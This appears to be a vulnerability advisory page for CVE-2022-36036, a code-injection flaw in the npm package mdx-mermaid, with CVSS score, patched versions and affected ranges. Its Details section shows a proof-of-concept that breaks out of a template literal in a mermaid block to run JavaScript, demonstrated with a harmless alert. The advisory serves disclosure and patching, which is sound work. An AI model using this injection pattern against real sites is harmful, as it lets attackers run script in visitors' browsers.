GHSA-rvgm-35jw-q628

Source

https://github.com/advisories/GHSA-rvgm-35jw-q628

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-rvgm-35jw-q628/GHSA-rvgm-35jw-q628.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-rvgm-35jw-q628

Aliases

CVE-2022-36036

Related

CVE-2022-36036

Published

2022-08-31T22:26:11Z

Modified

2023-11-08T04:09:58.603883Z

Severity

3.6 (Low) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N CVSS Calculator

Summary

Improper Control of Generation of Code ('Code Injection') in mdx-mermaid

Details

Impact

Arbitary javascript injection

Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs

` + (function () {
  // Put Javascript code here
  return ''
}()) + `

The block below shows a valid mermaid code block

```mermaid
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

The same block but with the exploit added

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

Database specific

{
    "nvd_published_at": "2022-08-29T18:15:00Z",
    "github_reviewed_at": "2022-08-31T22:26:11Z",
    "severity": "LOW",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-94"
    ]
}

References

Affected packages

npm / mdx-mermaid

Package

Name: mdx-mermaid; View open source insights on deps.dev
Purl: pkg:npm/mdx-mermaid

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.3.0

GHSA-rvgm-35jw-q628

Impact

Patches

Workarounds

Affected packages

npm / mdx-mermaid

Package

Affected ranges

npm / mdx-mermaid

Package

Affected ranges

Affected versions

2.*